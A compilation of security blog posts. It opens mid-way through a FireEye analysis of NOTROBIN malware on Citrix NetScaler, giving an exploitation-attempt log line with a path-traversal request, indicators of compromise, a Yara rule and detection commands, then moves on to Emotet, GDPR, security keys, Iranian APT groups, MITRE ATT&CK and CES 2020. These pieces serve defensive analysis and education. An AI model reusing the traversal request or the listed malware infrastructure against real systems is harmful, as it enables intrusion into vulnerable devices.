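On the FreeBSD-based NetScaler appliance this check is a one-liner; either of the following should reveal the listener (sockstat is the native FreeBSD tool, netstat works as well):

# Look for a process bound to UDP port 18634
sockstat -4 -l | grep 18634
netstat -an -p udp | grep 18634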

NOTROBIN Efficacy

During one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt.

127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] "GET
/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-"
"curl/7.47.0"

Figure 8: Web log entry showing a failed exploitation attempt

Note that the application server responded with HTTP 404 (“Not Found”) as this actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created – and before it could be used by the other actor.

FireEye has not yet identified if the actor has returned to NOTROBIN backdoors.

Conclusion

FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.

Indicators of Compromise and Discovery

Table 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time of observed activity. As of January 15, the vilarunners[.]cat domain resolves to a new IP address, 80.240.31[.]218.

IOC Item             Value
HTTP URL prefix      hxxps://95[.]179.163.186/wp-content/uploads/2018/09/
Directory            /var/nstmp/.nscache
Filename             /var/nstmp/.nscache/httpd
Directory            /tmp/.init
Filename             /tmp/.init/httpd
Crontab entry        /var/nstmp/.nscache/httpd
Listening UDP port   18634
Remote IP            95.179.163[.]186
Remote IP            80.240.31[.]218
Domain               vilarunners[.]cat

Table 1: Indicators of Compromise
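
A hedged one-pass check for the host-based entries in Table 1 might look like the following when run as root from a shell on the appliance (paths are exactly as listed above; the nobody account is the one observed in the cron logs):

# Check for NOTROBIN staging and persistence artifacts on disk
ls -la /tmp/.init /var/nstmp/.nscache 2>/dev/null

# Check for the cron persistence entry
crontab -u nobody -l 2>/dev/null | grep nscache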

Discovery on VirusTotal

You can use the following VTI queries to identify NOTROBIN variants on VirusTotal:

  • vhash:"73cee1e8e1c3265c8f836516c53ae042"
  • vhash:"e57a7713cdf89a2f72c6526549d22987"

Note, the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.

rule NOTROBIN
{
    meta:
        author = "william.ballenthin@fireeye.com"
        date_created = "2020-01-15"

    strings:
        $func_name_1 = "main.remove_bds"
        $func_name_2 = "main.xrun"

    condition:
        all of them
}

Figure 9: Yara rule that matches on NOTROBIN variants

Recovered Authentication Keys

FireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won’t publish them here out of concern for our customers, please reach out if you’re looking for NOTROBIN within your environment and we can provide a list.

Acknowledgements

Thank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer for collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across intel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN samples, and Ashley Frazer for refining the presentation and conclusions.

How Frankfurt Stopped Emotet In Its Tracks

During a time when ransomware continues to bring governments around the world to a halt, one city has turned the tables by bringing its government to a halt pre-emptively to prevent ransomware.

According to ZDNet, in late December, Frankfurt, Germany—one of the world’s biggest financial hubs—reportedly shut down its IT network after its anti-malware platform identified an Emotet infection. The reported malware gained entry when an employee clicked on a malicious email that had been spoofed to look as though it came from a city authority.

Rather than risk further spread and subsequent, more damaging infection, government authorities made the difficult decision to halt the IT network until the Emotet threat was resolved. As a result, all of the city’s IT functions, including employee email, essential apps, and all services offered through the Frankfurt.de webpage, were shut down for over 24 hours. The move paid off, however: as IT department spokesman Gunter Marr told Journal Frankfurt, no lasting damage had occurred.

“In my opinion, Frankfurt made a very brave—probably not easy—decision to shut down the network to eradicate their Emotet infection,” said John Fokker, Head of Cyber Investigations for McAfee Advanced Threat Research. “Emotet infection is a precursor to Ryuk ransomware, so I think they dodged the proverbial bullet.”

The Emotet-Ransomware Connection

In many cases, the first sign of ransomware is the ransom demand itself, alerting you that you’ve been infected and asking you to pay up. The Emotet malware works a bit differently in that it is not, in itself, ransomware. Instead, it functions like the key to a door: Emotet infects the system, and once the system is “open,” access to the Emotet-infected network can be sold to ransomware groups and other cybercriminals, who may then utilize stolen credentials and simply “walk in.” In a recent campaign, once Emotet was downloaded, it in turn downloaded the Trickbot trojan from a remote host, which stole credentials and enabled a successful Ryuk ransomware infection.

However, the same multistep process that can deliver two paydays on a single deployment of ransomware is also its Achilles’ Heel. Since getting ransomware from an Emotet infection is generally a two or more-step process, if you can stop or eliminate Emotet at Step 1, the subsequent steps toward a ransomware infection cannot occur.

While Frankfurt’s Emotet infection and the subsequent shutdown led to more than a day’s loss in productivity, massive outages and major disruption, the city should be commended on its quick and level-headed response—had they attempted to preserve business operations or opted to take a wait-and-see approach, a potential ransomware infection could have cost them millions more in lost productivity and threat mitigation.

An Ounce of Prevention …

While Frankfurt was able to intercept the Emotet botnet in time, many others were not—another attack several days before, in a town just north of Frankfurt, resulted in massive disruption when the Emotet malware led to the successful deployment of Ryuk ransomware. In other words, the best and safest way to avoid a similar fate is to prevent an Emotet infection in the first place.

There are several steps you can take to keep Emotet from establishing a stronghold in your network:

  1. Educate Your Employees: The most important step is to educate your employees on how to identify phishing and social engineering attempts. Identify email security best practices, such as hovering over a link to identify the actual destination before clicking on a link, never giving account information over email, and mandating that all suspicious emails be immediately reported.
  2. Patch Vulnerabilities: The Trickbot trojan is frequently delivered as a secondary payload to Emotet, and it can spread using the Microsoft Windows EternalBlue vulnerability, so patching this vulnerability is an important step to securing your network.
  3. Strengthen Your Logins: If Emotet does gain entrance, it can attempt to spread by guessing the login credentials of connected users. By mandating strong passwords and two-factor authentication, you can help limit the spread.
  4. Adopt Strong Anti-Malware Protection, And Ensure It’s Configured Properly: A timely alert from a capable anti-malware system enabled Frankfurt to stop Emotet. Adopting strong endpoint protection such as McAfee Endpoint Security (ENS) is one of the most important steps you can take to help prevent Emotet and other malware. Once it’s in place, you can maximize your protection by performing periodic maintenance and optimizing configurations.

Above all, don’t fall into the trap of thinking it couldn’t happen to you. According to the McAfee Labs Threats Report, ransomware grew by 118% in just the first quarter of 2019, and several new ransomware families were detected. If the spate of recent attacks is any indication, we may see similar trends in Q1 2020.

“The demand for access to large corporate or public sector networks is very high at the moment,” Fokker explained. “Ransomware actors are constantly scanning, spearphishing, purchasing access gained from other malware infections, and obtaining log files from info-stealing malware to get a foothold into networks.”

“Every company or institution should be diligent and not ignore even the simplest breach—even if it happened more than a year ago,” Fokker said.


The post How Frankfurt Stopped Emotet In Its Tracks appeared first on McAfee Blogs.

GDPR Checklist For Small Businesses

The General Data Protection Regulation (GDPR), which came into effect in 2018, brought some big changes in the way businesses collect and handle personal data. The idea behind the legislation is to give individuals better access to, and control over, their own personal data. While this is great news for individuals, it requires a little extra work from businesses, which must now provide legal grounds for collecting data and use it only for the intended purpose. What’s more, they need to follow these regulations to the letter and remain GDPR compliant at all times.

This applies to companies of all sizes – even your small business. If you collect personal data in any form, such as emails, addresses, names or financial details, your business needs to be GDPR compliant. If it’s found that you’re not effectively managing and protecting your data you could face a big fine. Though regulators may be a bit more lenient with smaller businesses depending on how much data you hold, an unwanted fine is always bad news. That’s why we’ve put together this checklist to help ensure your small business is GDPR compliant. In this guide we’ll look at:

  • Understanding your data and responsibilities
  • Defining your data consent policy
  • Access requests and disposing of old data
  • Setting up a data storage and security policy
  • Training all staff on GDPR
  • Creating data processing notices

  1. Understanding your data and responsibilities

In order to be GDPR compliant it’s important that you understand what data you’re collecting and your responsibilities as a business. It’s therefore a good idea to get clued up on what is defined as ‘personal data’ and set out strict guidelines on how much information you need to collect. This is because a huge part of GDPR is ensuring that you only collect personal information you actually need and that it is only used for the intended purpose. The less you collect the easier it is to stay compliant.

You’ll also want to ensure anyone that is involved in the handling of data understands how to collect and store the data effectively, as well as how to process it in line with GDPR. As you collect data, it’s a good idea to keep a note of how consent is being obtained and what processes the data goes through once it has been collected.


  2. Setting out your data consent policy

Getting clear and explicit consent from individuals to collect and use their data is one of the most important aspects of GDPR. For this reason, you need to outline to customers or those using your services why you’re collecting their data and how you intend to use it in the future. Once they have actively agreed, you can then collect their data – this is usually done through sign-up forms or pop-ups. However, if they do not give you permission then under no circumstances should you record their personal information.

You must be able to show that you have obtained consent for all the data that you have collected; otherwise, you run the risk of being fined. Another point worth noting is that you can no longer rely on underhand tactics such as pre-ticked boxes to gain consent. This is now illegal under GDPR and can land you in trouble. Finally, you must make it easy for individuals to opt out of receiving your communications. The best way to do this is by adding an unsubscribe button at the bottom of all emails.


  3. Access requests and disposing of old data

If you haven’t already, GDPR requires that you obtain fresh consent from customers whose information you held before the new guidelines came into force in May 2018. If they do not give their consent again, or do not reply to your email at all, you must delete their data as soon as possible. An important part of your GDPR checklist should be putting auditing processes in place that determine how long you will store data. For example, if a customer has not engaged with your brand in 12 months, it is no longer necessary to keep their information and it should therefore be deleted.

What’s more, as part of GDPR every EU individual has the right to access their data. Therefore you need a system in place to deal with access requests. You’ll have 30 days from receiving the request to provide them with an electronic copy of all the information you have on them. They can also request that this be deleted, so you need a system in place to get this done as quickly as possible.
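
To make the auditing idea above concrete, here is a minimal sketch that flags customer records with no engagement in the last 12 months for deletion. The record structure, field names and 12-month cut-off are assumptions for illustration only; you would adapt them to your own systems and retention policy.

```python
from datetime import datetime, timedelta

# Hypothetical customer records; in practice these would come from your CRM or database.
customers = [
    {"email": "alice@example.com", "last_engagement": datetime(2019, 2, 1)},
    {"email": "bob@example.com", "last_engagement": datetime(2019, 12, 20)},
]

RETENTION_PERIOD = timedelta(days=365)  # example policy: delete after 12 months of inactivity


def records_to_delete(records, now=None):
    """Return records whose last engagement falls outside the retention period."""
    now = now or datetime.utcnow()
    return [r for r in records if now - r["last_engagement"] > RETENTION_PERIOD]


if __name__ == "__main__":
    for record in records_to_delete(customers):
        # Replace this print with an actual deletion (and an entry in your audit log).
        print(f"Schedule deletion for {record['email']}")
```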


  4. Setting up a data storage and security policy

GDPR is designed to protect the rights and personal information of individuals, so you need to make sure you’re taking care of the data you’re collecting. This means knowing where it is stored and ensuring you’ve got the security measures in place to keep it safe. Mapping out all the places where you store data, be that email, databases or cloud-based systems, makes it easier to find and deal with access or deletion requests. Your storage and security policy should outline where everything is stored, how it is protected and who has access to said data.

You also need to know how data is being transferred and how information flows around your business. This stops information from getting lost or falling into the wrong hands. It also pays to have a system in place in case hardware containing sensitive information is accessed or lost. For example, if a laptop full of information is misplaced, having the data encrypted means you’re less likely to fall victim to a breach or face a fine.


  5. Training all staff on GDPR

Most data breaches or security mistakes come as a result of human error. Unfortunately, in this case ignorance isn’t bliss: you cannot use it as an excuse for mishandling data. For this reason, it’s important that all members of your team are clued up on GDPR, their personal responsibilities for looking after personal data, and how to recognise a breach. Under GDPR, you must report any data breaches within 72 hours, which becomes much easier if everyone in your team is educated on what a breach looks like and who they need to report to.


  6. Creating data processing notices

Finally, data handling needs to be a clear and transparent process, so it’s a good idea to create a notice explaining how your business collects and processes data. This is often called a Fair Processing Notice and can be sent out to customers and users as well as displayed somewhere on your website. It should outline how you capture, use and store data, as well as giving instructions on how an individual can make an access or deletion request. This helps them understand how you are protecting their data and can be great for building your reputation as a legitimate and caring business.


The post GDPR Checklist For Small Businesses appeared first on CyberDB.

Have an iPhone? Use it to protect your Google Account with the Advanced Protection Program



Phishing—when an online attacker tries to trick you into giving them your username and password—is one of the most common causes of account compromises. We recently partnered with The Harris Poll to survey 500 high-risk users (politicians and their staff, journalists, business executives, activists, online influencers) living in the U.S. Seventy-four percent of them reported having been the target of a phishing attempt or compromised by a phishing attack.

Gmail automatically blocks more than 100 million phishing emails every day and warns people that are targeted by government-backed attackers, but you can further strengthen the security of your Google Account by enrolling in the Advanced Protection Program—our strongest security protections that automatically help defend against evolving methods attackers use to gain access to your personal and work Google Accounts and data.

Security keys are an important feature of the Advanced Protection Program, because they provide the strongest protection against phishing attacks. In the past, you had to separately purchase and carry physical security keys. Last year, we built security keys into Android phones—and starting today, you can activate a security key on your iPhone to help protect your Google Account.

Activating the security key on your iPhone with Google’s Smart Lock app

Security keys use public-key cryptography to verify your identity and the URL of the login page, so that an attacker can’t access your account even if they have your username or password. Unlike other two-factor authentication (2FA) methods that try to verify your sign-in, security keys are built with FIDO standards that provide the strongest protection against automated bots, bulk phishing attacks, and targeted phishing attacks. You can learn more about security keys from our Cloud Next ‘19 presentation.
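
To make the “verifies the URL of the login page” point concrete, here is a stripped-down sketch of the idea behind FIDO origin binding: the authenticator signs the server’s challenge together with the origin the browser reports, so a signature produced on a phishing domain fails verification at the real site. This only illustrates the concept using the cryptography library; it is not Google’s or FIDO’s actual wire protocol.

```python
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

# Key pair held by the security key; only the public half is registered with the site.
private_key = ec.generate_private_key(ec.SECP256R1())
public_key = private_key.public_key()


def sign_assertion(challenge: bytes, origin: str) -> bytes:
    """The authenticator signs the challenge bound to the origin the browser actually saw."""
    return private_key.sign(challenge + origin.encode(), ec.ECDSA(hashes.SHA256()))


def verify_assertion(signature: bytes, challenge: bytes, expected_origin: str) -> bool:
    """The site only accepts signatures made over its own origin."""
    try:
        public_key.verify(signature, challenge + expected_origin.encode(), ec.ECDSA(hashes.SHA256()))
        return True
    except InvalidSignature:
        return False


challenge = b"random-server-challenge"
phished = sign_assertion(challenge, "https://phishing.example")
print(verify_assertion(phished, challenge, "https://accounts.google.com"))  # False: wrong origin
genuine = sign_assertion(challenge, "https://accounts.google.com")
print(verify_assertion(genuine, challenge, "https://accounts.google.com"))  # True
```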


Approving the sign-in to a Google Account with Google’s SmartLock app on an iPhone

On your iPhone, the security key can be activated with Google’s Smart Lock app; on your Android phone, the functionality is built in. The security key in your phone uses Bluetooth to verify your sign-in on Chrome OS, iOS, macOS and Windows 10 devices without requiring you to pair your devices. This helps protect your Google Account on virtually any device with the convenience of your phone.

How to get started

Follow these simple steps to help protect your personal or work Google Account today:
  • Activate your phone’s security key (Android 7+ or iOS 10+)
  • Enroll in the Advanced Protection Program
  • When signing in to your Google Account, make sure Bluetooth is turned on for both your phone and the device you’re signing in on.
We also highly recommend registering a backup security key to your account and keeping it in a safe place, so you can get into your account if you lose your phone. You can get a security key from a number of vendors, including Google, with our own Titan Security Key.

If you’re a Google Cloud customer, you can find out more about the Advanced Protection Program for the enterprise on our G Suite Updates blog.

Here’s to stronger account security—right in your pocket.

NIST Requesting Information to Upgrade the iEdison System

The National Institute of Standards and Technology (NIST) plans to begin modernizing the Interagency Edison System (iEdison), drawing on feedback and insights from the 32 agencies that currently use the older platform. Under the guidance of the Lab-to-Market cross-agency priority goal and the White House’s Office of Science and Technology Policy, and in support of the President’s Management Agenda, NIST will relaunch iEdison as a digital government tool for the 21st century. The original iEdison platform was created in 1995 and hosted by the National Institutes of Health.

Iranian Threat Actors: Preliminary Analysis

Iran’s cybersecurity capabilities are currently under the microscope: many news sites, government agencies and security experts warn about possible infiltration by the Iranian government and advise raising defensive levels. Today I want to share a quick and short study based on cross-correlating MITRE ATT&CK and Malpedia data about some of the main threat actors attributed to Iran. The following sections describe the TTPs (tactics, techniques and procedures) used by some of the most influential Iranian APT groups. Each section comes with a main graph, built by scripting and presented without a legend, so please keep in mind while reading that the red circles represent the analyzed threat actors, the green circles the techniques they use, the blue circles their malware, and the black circles their tool sets.
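
For readers who want to reproduce this kind of visualization, the following is a minimal sketch of the scripted approach described above, using networkx and the same colour convention (red for actors, green for techniques, blue for malware, black for tools). The actor-to-TTP mapping shown is an illustrative placeholder, not the full MITRE/Malpedia dataset behind the graphs in this post.

```python
import networkx as nx

# Illustrative subset of actor -> (techniques, malware, tools) mappings.
actors = {
    "OilRig": {
        "techniques": ["Spearphishing Attachment", "DNS C2"],
        "malware": ["Helminth", "BONDUPDATER"],
        "tools": ["Mimikatz", "PsExec"],
    },
}

COLORS = {"actor": "red", "technique": "green", "malware": "blue", "tool": "black"}

G = nx.Graph()
for actor, ttps in actors.items():
    G.add_node(actor, color=COLORS["actor"])
    for kind in ("techniques", "malware", "tools"):
        node_color = COLORS[kind.rstrip("s")]  # "techniques" -> "technique", etc.
        for item in ttps[kind]:
            G.add_node(item, color=node_color)
            G.add_edge(actor, item)

print(G.number_of_nodes(), "nodes,", G.number_of_edges(), "edges")
```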

OilRig

According to Malpedia: “OilRig is an Iranian threat group operating primarily in the Middle East by targeting organizations in this region that are in a variety of different industries; however, this group has occasionally targeted organizations outside of the Middle East as well. It also appears OilRig carries out supply chain attacks, where the threat group leverages the trust relationship between organizations to attack their primary targets.” The threat actor uses open-source tools such as Mimikatz and LaZagne, along with common sysadmin tools shipped with Windows or available from Sysinternals, such as PsExec, CertUtil, netstat, systeminfo, ipconfig and tasklist. BONDUPDATER, Helminth, QUADAGENT and POWRUNER are some of the most sophisticated malware families attributed to OilRig and analyzed over the past few years. The techniques (green) are mainly focused on lateral movement and on gaining persistence in the victim infrastructure; few of them involve exploits or 0-days.

OilRig TTP

These observations suggest a group mostly focused on staying hidden rather than on gaining access through advanced techniques; indeed, no 0-days or advanced exploits were observed against the target infrastructure. If so, we are facing a state-sponsored group with strong capabilities in building persistence and hidden communication channels (for example over DNS), but without a deep interest in exploiting services. This raises a question: does OilRig not need advanced exploitation capabilities because getting into a victim infrastructure is already easy enough, for example through leaked user credentials, social engineering toolkits and targeted phishing, or is there more yet to be discovered?

MuddyWater

According to MITRE: “MuddyWater is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group’s victims are mainly in the telecommunications, government (IT services), and oil sectors.” We currently have few artifacts related to MuddyWater (“Muddy”); indeed, only the POWERSTATS backdoor is actually attributed to it. Their attacks are typically “hands-on”, meaning they do not automate lateral movement but prefer open-source or Sysinternals tools to move deliberately through the target network rather than running exploits or scanners at scale.

MuddyWater TTP

Once inside a victim machine, Muddy looks for local credentials and then moves laterally by using those credentials directly against the network and domain controllers. Judging by the MITRE techniques (green), it might take MuddyWater a few months to take over an entire target network, but the accesses are quite silent and well obfuscated. Again, it looks like we are facing a group that does not need advanced exploitation capabilities, but rather advanced IT knowledge, in order to move between network segments and any intervening proxies or NAT.

APT33

According to MITRE: “APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.” Analyzing the observed TTPs, this threat actor looks very close to MuddyWater. If you compare the Muddy graph (in the previous section) with the APT33 graph (following), you will see many similarities: many tools and techniques are shared, and even the artifacts POWERSTATS (Muddy) and POWERTON (APT33) share functions and a small subset of code (even though they have different code bases and differ in functionality). We have more information about APT33 than about MuddyWater, but the similarities in TTPs could lead an avid reader to consider APT33 the main threat actor and MuddyWater a specific “operation” of that actor.

APT33 TTP

But if you wonder why I decided to keep them separate in this personal and preliminary analysis, the answer lies in why they attack. APT33 has shown destructive intent, using malware such as Shamoon and StoneDrill, while Muddy mostly wants to backdoor its victims.

CopyKittens

According to MITRE: “CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.” The CopyKittens threat actor differs from the previous ones. First of all, we see the usage of Cobalt Strike, which is an autonomous exploitation system (well, actually it is much more, but let me simplify). Cobalt Strike and Empire (a post-exploitation framework) taken together allow the attacker to automate lateral movement, which is very different behavior from the previous actors. Using such automation tools, CopyKittens makes much more noise inside an attacked network and is easier to detect, but on the other hand it can reach its targets and get out much more quickly.

CopyKittens TTP

One more distinguishing characteristic is code signing. While in OilRig, MuddyWater and APT33 we mostly observed scripting capabilities, in CopyKittens we observe more advanced development capabilities. Code signing is used on Microsoft Windows and iOS to guarantee that software comes from a known developer and has not been tampered with. While a script (Node, Python, AutoIt) could be attributed to IT staff as well as developers, building more robust and complex software (in Java, .NET, C++, etc.) is a skill typically attributed to developers. This difference could be significant, suggesting a somewhat different set of people working on CopyKittens.

Cleaver

According to MITRE: “Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. [1] Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889).” We have little information about this group, and as you might see there are few similarities with the others. The usage of Mimikatz could easily be explained by credential dumping, while TinyZBot is quite an interesting tool since it mostly implements spying capabilities without a strong architectural design, code execution, or data exfiltration.

Cleaver TTP

Just like Charming Kitten (not included in this report since it remains something of an ongoing mystery, even though a great report from ClearSky is available), Cleaver is a threat group responsible for one of the most advanced and silent cyber attacks attributed to Iran known to date (Operation Cleaver, documented by Cylance). Cleaver’s attack capabilities have evolved very quickly over time and, according to Cylance, the group has been active since 2012. They appear to have infiltrated some of the world’s economic powers (ref: here), including Canada, China, England, France, Germany, India, Israel, Kuwait, Mexico, Pakistan, Qatar, Saudi Arabia, South Korea, Turkey, the United Arab Emirates, and the United States. On the very first page of the OpCleaver report, the author writes that Cleaver is one of the most advanced threat actors ever. Even if I might agree with Cylance, I personally do not have such evidence so far, so I cannot compare the Cleaver threat actor to the previous ones.

Threat Actors Comparison

Here comes the fun part! How about taking all these graphs and comparing them? Common references highlight similarities, scopes and shared TTPs, and we can appreciate them in the following single network diagram. You could spend well over 20 minutes checking the details of this graph, and I could write an essay about it, but I will not do that :D. I would rather focus on a few important thoughts.

The hyper-connection between the analyzed groups (take a look at the following graph) could indicate that these teams are really linked together. They share techniques, procedures, tools and infection artifacts, and everything we observe looks like it belongs to a single meta-actor. We might agree that this meta-actor is linked to the sponsoring nation, and we might decide to consider some of these groups as operations. In other words, we might be looking at a single pool of people that teams up depending on the ongoing operation, adopting similar capabilities and tool sets.

Threat Actor Comparison

OilRig and APT33 are the best-known groups attributed to Iran; they share many tools, but they clearly have different intents and different code bases (speaking of malware). CopyKittens, for example, is clustered closer to APT33, while MuddyWater sits right in the middle of them. But if we closely analyze the purposes and the malware used, we might agree on placing Muddy closer to APT33; the weight of shared code should arguably count more than common tools or common techniques, but I did not represent that level of detail in the graphs. A rough scoring approach is sketched below.
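
One way to make the clustering argument above concrete is to weight shared code more heavily than shared tools or techniques when scoring actor similarity. The sketch below is a toy illustration of that idea using Jaccard similarity over made-up sets; it is not the actual data behind the comparison graph.

```python
WEIGHTS = {"techniques": 1.0, "tools": 1.0, "code": 3.0}  # shared code counts more


def jaccard(a, b):
    """Jaccard similarity between two sets (0 when both are empty)."""
    return len(a & b) / len(a | b) if (a | b) else 0.0


def weighted_similarity(x, y, weights=WEIGHTS):
    """Blend per-category Jaccard scores using the chosen weights."""
    total = sum(weights.values())
    return sum(weights[k] * jaccard(x[k], y[k]) for k in weights) / total


# Illustrative, made-up TTP sets.
apt33 = {"techniques": {"Scripting", "PowerShell"}, "tools": {"Empire"}, "code": {"POWERTON"}}
muddy = {"techniques": {"Scripting", "PowerShell"}, "tools": {"Empire"}, "code": {"POWERSTATS"}}

print(f"APT33 vs MuddyWater: {weighted_similarity(apt33, muddy):.2f}")
```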

However, two different levels of coding experience are observed. The first is mostly focused on scripting (Node, Python, AutoIt), which could indicate a group of people who came up through IT departments and later acquired cybersecurity skills, while the second is oriented toward deeper development skills in languages such as Java, .NET and C++. On the MuddyWater and APT33 side, the use of scripting engines, PowerShell and the Empire framework taken together, plus the lack of exploitation capabilities or of sophisticated malware development, could lead an analyst to think these threat actors hit their targets without needing strong development capabilities. On the other hand, OilRig, Cleaver and CopyKittens appear to have more software development skill and to be mostly focused on stealthy operations.

Conclusion

In this post I presented a preliminary and personal analysis of threat actors attributed by the community to Iran, comparing TTPs from MITRE with relations extracted from Malpedia. The outcome is a proposal to consider the numerous groups (OilRig, APT33, MuddyWater, Cleaver, etc.) as a single meta threat actor and to divide them by operation rather than by real group.

Advisory 2020-002: Critical Vulnerabilities for Microsoft Windows Announced, Patch Urgently

On 15 January 2020 (AEDT), Microsoft released security patches for three critical vulnerabilities and one important vulnerability in the Microsoft Remote Desktop Client, Remote Desktop Gateway and the Windows operating system. The ACSC recommends that users of these products apply the patches urgently to prevent malicious actors from using these vulnerabilities to compromise networks.

MITRE ATT&CK™, What’s the Big Idea?

MITRE describes ATT&CK™ as “a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.”  While this is a fine definition, it helps to understand the significance of what this framework enables.

The tactics, techniques, and procedures (TTPs) represented in ATT&CK allow organizations to understand how adversaries operate.  Once you have this understanding, you can take measures to mitigate those risks.

So, in the end, ATT&CK is about risk management. 

                  Cycle of Mitigation

ATT&CK In Action

At the MITRE ATT&CKcon 2.0 conference, industry leaders from Nationwide presented on Using Threat Intelligence to Focus ATT&CK Activities.  They described the process of taking the larger ATT&CK matrix and reducing it to a more contextual and manageable set of items they could act on, mitigating the most relevant vectors for their organization.

One great aspect of ATT&CK is that the data is available for all to see.  Leveraging the collective base of reports, we can build a prevalence view of the matrix.  As of January 2020, there were some 266 techniques, referenced across 449 actors and tools.

              MITRE ATT&CK™ Enterprise Treemap (October 2019)

Here we see that the Remote File Copy technique was used by 42% of the referenced actors and tools.  Indeed, this is an important and heavily used technique present in attacks carried out by various actors, including APT3 and APT38, as well as noteworthy malware such as Shamoon and WannaCry, to name just a few.
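
Building this prevalence view is a simple counting exercise over the ATT&CK mappings: for each technique, count how many of the referenced actors and tools are reported to use it, then divide by the total. The sketch below uses a small placeholder mapping; the real data would come from the ATT&CK knowledge base itself.

```python
from collections import Counter

# Placeholder mapping of actors/tools to the techniques they are reported to use.
usage = {
    "APT3": {"Remote File Copy", "Credential Dumping"},
    "APT38": {"Remote File Copy", "Scripting"},
    "Shamoon": {"Remote File Copy"},
    "WannaCry": {"Remote File Copy", "Exploitation of Remote Services"},
}

counts = Counter(t for techniques in usage.values() for t in techniques)
total = len(usage)

for technique, count in counts.most_common(5):
    print(f"{technique}: used by {count / total:.0%} of referenced actors and tools")
```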

MITRE ATT&CK Evaluation

In 2019, MITRE began evaluating security vendors using these techniques to measure their ability to see the activities of an adversary. The first evaluation, or Round 1, was based on an APT3-style attack and included many of the items on the treemap above.  As you might expect, Remote File Copy was represented.  During the evaluation, MITRE copied a DLL to a remote system (something that the Petya malware does).  While several vendors were able to show telemetry for this action, thanks to MVISION EDR, McAfee was one of only two vendors that showed a Specific Behavior alert for this activity (see 7.B.1 on the technique comparison), a designation reserved for the most descriptive of all detection categories (see Round 1 Detection Categories).  For more information on McAfee’s Round 1 results, see the MITRE ATT&CK™ APT3 Assessment.

Putting It All Together

Having the necessary visibility into the actions taken by an attacker is a key component in understanding the risks an organization faces.  Armed with this information, a response can be carried out and a mitigation plan created and rolled out to thwart future attacks.

MITRE ATT&CK is a great advancement in enabling organizations to characterize and subsequently manage risk.


The post MITRE ATT&CK™, What’s the Big Idea? appeared first on McAfee Blogs.

The Top Technology Takeaways From CES 2020

Another Consumer Electronics Show (CES) has come and gone. Every year, this trade show joins practically everyone in the consumer electronics industry to show off the latest and greatest cutting-edge innovations in technology. From bendable tablets to 8k TVs and futuristic cars inspired by the movie “Avatar,” CES 2020 did not disappoint. Here are a few of the key takeaways from this year’s show:

Smart home technology is driven by convenience

As usual, smart home technology made up a solid portion of the new gadgets introduced at CES. Netatmo introduced the Netatmo Smart Door Lock and Keys which use physical NFC (meaning near field communication, a technology that allows devices to communicate with each other) keys as well as digital keys for guests. In the same realm of home security, Danby’s smart mailbox called the Parcel Guard allows couriers to deliver packages directly into the anti-theft box using a code or smartphone app.

Devices integrated with Alexa technology

CES 2020 also introduced many devices integrated with Alexa technology. Kohler debuted its Moxie showerhead, complete with an Alexa-enabled waterproof Bluetooth speaker. Along with the showerhead, Alexa was also built into a Dux Swedish luxury bed to help improve users’ bedtime routines.

Smart appliances

CES is usually graced with a handful of smart appliances, and this year was no different. Bosch partnered with the recipe and meal-planning app Chefling to showcase its high-tech Home Connect Refrigerator, which uses cameras to track which food items users have stocked and suggests recipes based on that information.

Mind-reading wearables translate thoughts into digital commands

CES featured several products that let users control apps, games, and devices with their minds. Companies have developed devices that can record brain signals from sensors on the scalp or devices implanted within the brain and translate them into digital signals. For example, NextMind has created a headset that measures activity in the visual cortex and translates the user’s decision of where to focus his or her eyes into digital commands. This technology could replace remote controls, as users would be able to change channels, mute, or pause just by focusing on triangles next to each command.

Another company focused on the brain-computer interface is BrainCo. This company debuted their FocusOne headband at CES this year, complete with sensors on the forehead measuring the activity in the frontal cortex. This device is designed to measure focus by detecting the subtle electrical signals that your brain is producing. These headbands are designed to help kids learn how to focus their minds in class. BrainCo also has a prosthetic arm coming to market later this year which detects muscle signals and feeds them through an algorithm that can help it operate better over time. What’s more, this device will cost less than half of an average prosthetic.

Foldable screens are still a work-in-progress

This year’s event was colored with folding screens. However, most of these devices were prototypes without proposed ship dates. A likely reason for the lack of confidence in these devices by their manufacturers is that they are unsure if the screens will be durable enough to sell. Some of these work-in-progress devices include Dell’s Concept Ori, Intel’s Horseshoe Bend, and Lenovo’s ThinkPad X1 Fold. Nevertheless, folding devices provide a new opportunity for manufacturers to play around with device forms, such as a phone that turns into a tablet.

